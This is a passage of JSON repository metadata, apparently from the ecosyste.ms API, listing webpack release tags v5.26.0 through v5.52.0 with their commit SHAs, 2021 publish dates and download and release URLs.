/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26